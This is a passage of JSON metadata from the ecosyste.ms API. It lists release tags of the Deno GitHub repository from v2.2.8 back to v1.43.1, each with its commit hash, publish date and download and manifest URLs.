ositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/